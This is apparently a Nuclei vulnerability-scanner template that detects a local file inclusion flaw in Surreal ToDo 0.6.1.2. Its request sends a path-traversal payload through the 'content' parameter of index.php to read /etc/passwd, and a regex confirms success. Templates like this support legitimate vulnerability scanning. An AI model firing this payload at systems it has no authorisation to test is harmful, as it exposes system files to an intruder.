id: surrealtodo-lfi

info:
  name: Surreal ToDo 0.6.1.2 - Local File Inclusion
  author: arafatansari
  severity: high
  description: |
    Surreal ToDo 0.6.1.2 is vulnerable to local file inclusion via index.php and the content parameter.
  reference:
    - https://www.exploit-db.com/exploits/45826
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
  tags: surreal,lfi,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
